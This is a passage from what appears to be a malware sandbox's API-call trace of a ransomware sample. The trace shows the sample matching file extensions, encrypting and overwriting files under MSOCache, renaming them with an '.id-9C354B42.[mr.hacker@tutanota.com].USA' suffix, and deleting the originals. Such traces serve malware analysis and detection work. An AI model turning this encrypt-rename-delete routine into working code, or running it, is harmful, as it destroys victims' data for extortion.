Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0046.736] lstrlenW (lpString=".1cd") returned 4 [0046.736] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0046.736] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0046.736] lstrlenW (lpString=".jpg") returned 4 [0046.736] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0046.736] lstrcmpiW (lpString1=".EXE", lpString2=".USA") returned -1 [0046.736] lstrlenW (lpString="DW20.EXE") returned 8 [0046.736] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0046.952] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=838536) returned 1 [0046.952] CloseHandle (hObject=0x1fc) returned 1 [0046.952] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe")) returned 0x2020 [0046.952] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.953] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0046.953] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.953] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.986] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0046.987] GetLastError () returned 0x0 [0046.987] ReadFile (in: hFile=0x1fc, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0xccb88, lpOverlapped=0x0) returned 1 [0047.151] WriteFile (in: hFile=0x178, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xccb90, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xccb90, lpOverlapped=0x0) returned 1 [0047.165] ReadFile (in: hFile=0x1fc, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0047.165] WriteFile (in: hFile=0x178, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xe4, lpOverlapped=0x0) returned 1 [0047.165] SetEndOfFile (hFile=0x178) returned 1 [0047.343] CloseHandle (hObject=0x178) returned 1 [0047.344] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.344] SetEndOfFile (hFile=0x1fc) returned 1 [0047.351] CloseHandle (hObject=0x1fc) returned 1 [0047.351] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0047.351] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe")) returned 1 [0047.595] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0047.595] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0047.595] lstrlenW (lpString=".doc") returned 4 [0047.595] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0047.595] lstrlenW (lpString=".docx") returned 5 [0047.596] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0047.596] lstrlenW (lpString=".pdf") returned 4 [0047.596] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0047.596] lstrlenW (lpString=".xls") returned 4 [0047.596] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0047.596] lstrlenW (lpString=".xlsx") returned 5 [0047.596] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0047.596] lstrlenW (lpString=".ppt") returned 4 [0047.596] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0047.596] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0047.596] lstrlenW (lpString=".zip") returned 4 [0047.596] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0047.596] lstrlenW (lpString=".rar") returned 4 [0047.596] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0047.596] lstrlenW (lpString=".bz2") returned 4 [0047.596] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0047.596] lstrlenW (lpString=".7z") returned 3 [0047.596] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0047.596] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0047.596] lstrlenW (lpString=".dbf") returned 4 [0047.596] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0047.596] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0047.596] lstrlenW (lpString=".1cd") returned 4 [0047.596] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0047.596] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0047.596] lstrlenW (lpString=".jpg") returned 4 [0047.596] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0047.596] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0047.596] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0047.596] lstrlenW (lpString=".doc") returned 4 [0047.596] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0047.596] lstrlenW (lpString=".docx") returned 5 [0047.596] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0047.596] lstrlenW (lpString=".pdf") returned 4 [0047.596] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0047.596] lstrlenW (lpString=".xls") returned 4 [0047.596] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0047.597] lstrlenW (lpString=".xlsx") returned 5 [0047.597] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0047.597] lstrlenW (lpString=".ppt") returned 4 [0047.597] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0047.597] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0047.597] lstrlenW (lpString=".zip") returned 4 [0047.597] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0047.597] lstrlenW (lpString=".rar") returned 4 [0047.597] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0047.597] lstrlenW (lpString=".bz2") returned 4 [0047.597] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0047.597] lstrlenW (lpString=".7z") returned 3 [0047.597] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0047.597] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0047.597] lstrlenW (lpString=".dbf") returned 4 [0047.597] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0047.597] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0047.597] lstrlenW (lpString=".1cd") returned 4 [0047.597] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0047.597] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0047.597] lstrlenW (lpString=".jpg") returned 4 [0047.597] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0047.597] lstrcmpiW (lpString1=".dll", lpString2=".USA") returned -1 [0047.597] lstrlenW (lpString="osetupui.dll") returned 12 [0047.597] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0047.598] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=191872) returned 1 [0047.598] CloseHandle (hObject=0x178) returned 1 [0047.598] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll")) returned 0x2020 [0047.598] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.598] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0047.598] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.598] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.598] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0047.598] GetLastError () returned 0x0 [0047.598] ReadFile (in: hFile=0x178, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x2ed80, lpOverlapped=0x0) returned 1 [0047.720] WriteFile (in: hFile=0x160, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0x2ed90, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x2ed90, lpOverlapped=0x0) returned 1 [0047.724] ReadFile (in: hFile=0x178, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0047.724] WriteFile (in: hFile=0x160, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.724] SetEndOfFile (hFile=0x160) returned 1 [0047.724] CloseHandle (hObject=0x160) returned 1 [0047.724] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.724] SetEndOfFile (hFile=0x178) returned 1 [0047.726] CloseHandle (hObject=0x178) returned 1 [0047.726] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0047.726] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll")) returned 1 [0047.726] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.726] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.726] lstrlenW (lpString=".doc") returned 4 [0047.726] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.726] lstrlenW (lpString=".docx") returned 5 [0047.726] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0047.726] lstrlenW (lpString=".pdf") returned 4 [0047.726] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.726] lstrlenW (lpString=".xls") returned 4 [0047.726] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.726] lstrlenW (lpString=".xlsx") returned 5 [0047.726] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0047.726] lstrlenW (lpString=".ppt") returned 4 [0047.727] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.727] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.727] lstrlenW (lpString=".zip") returned 4 [0047.727] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.727] lstrlenW (lpString=".rar") returned 4 [0047.727] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.727] lstrlenW (lpString=".bz2") returned 4 [0047.727] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.727] lstrlenW (lpString=".7z") returned 3 [0047.727] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.727] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.727] lstrlenW (lpString=".dbf") returned 4 [0047.727] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.727] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.727] lstrlenW (lpString=".1cd") returned 4 [0047.727] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.727] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.727] lstrlenW (lpString=".jpg") returned 4 [0047.727] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.727] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.727] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.727] lstrlenW (lpString=".doc") returned 4 [0047.727] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.727] lstrlenW (lpString=".docx") returned 5 [0047.727] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0047.727] lstrlenW (lpString=".pdf") returned 4 [0047.727] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.727] lstrlenW (lpString=".xls") returned 4 [0047.727] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.727] lstrlenW (lpString=".xlsx") returned 5 [0047.727] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0047.727] lstrlenW (lpString=".ppt") returned 4 [0047.727] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.727] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.727] lstrlenW (lpString=".zip") returned 4 [0047.727] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.728] lstrlenW (lpString=".rar") returned 4 [0047.728] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.728] lstrlenW (lpString=".bz2") returned 4 [0047.728] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.728] lstrlenW (lpString=".7z") returned 3 [0047.728] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.728] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.728] lstrlenW (lpString=".dbf") returned 4 [0047.728] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.728] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.728] lstrlenW (lpString=".1cd") returned 4 [0047.728] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.728] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.728] lstrlenW (lpString=".jpg") returned 4 [0047.728] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.728] lstrcmpiW (lpString1=".cab", lpString2=".USA") returned -1 [0047.728] lstrlenW (lpString="AccLR.cab") returned 9 [0047.728] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0047.729] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=28016276) returned 1 [0047.729] CloseHandle (hObject=0x178) returned 1 [0047.729] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab")) returned 0x2020 [0047.729] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.729] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0047.729] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0047.729] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0047.730] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0047.730] ReadFile (in: hFile=0x178, lpBuffer=0x3bc0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3bc0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.733] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x8e7f86, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0047.734] ReadFile (in: hFile=0x178, lpBuffer=0x3c00058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c00058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.738] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0047.738] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x1a77e94, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0047.738] ReadFile (in: hFile=0x178, lpBuffer=0x3c40058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c40058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.376] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.376] WriteFile (in: hFile=0x178, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0048.391] SetEndOfFile (hFile=0x178) returned 1 [0048.391] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fe70d0 [0048.391] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0048.391] WriteFile (in: hFile=0x178, lpBuffer=0x3fe70d0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fe70d0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.392] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x8e7f86, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0048.392] WriteFile (in: hFile=0x178, lpBuffer=0x3fe70d0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fe70d0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.395] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x1a77e94, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0048.395] WriteFile (in: hFile=0x178, lpBuffer=0x3fe70d0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fe70d0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.397] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fe70d0 | out: hHeap=0x5d0000) returned 1 [0048.397] CloseHandle (hObject=0x178) returned 1 [0048.397] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0048.397] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0048.397] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0048.397] lstrlenW (lpString=".doc") returned 4 [0048.397] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0048.397] lstrlenW (lpString=".docx") returned 5 [0048.397] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0048.397] lstrlenW (lpString=".pdf") returned 4 [0048.397] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0048.397] lstrlenW (lpString=".xls") returned 4 [0048.397] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0048.397] lstrlenW (lpString=".xlsx") returned 5 [0048.397] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0048.397] lstrlenW (lpString=".ppt") returned 4 [0048.397] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0048.397] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0048.397] lstrlenW (lpString=".zip") returned 4 [0048.397] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0048.397] lstrlenW (lpString=".rar") returned 4 [0048.398] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0048.398] lstrlenW (lpString=".bz2") returned 4 [0048.398] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0048.398] lstrlenW (lpString=".7z") returned 3 [0048.398] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0048.398] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0048.398] lstrlenW (lpString=".dbf") returned 4 [0048.398] lstrcmpiW (lpString1=".dbf", 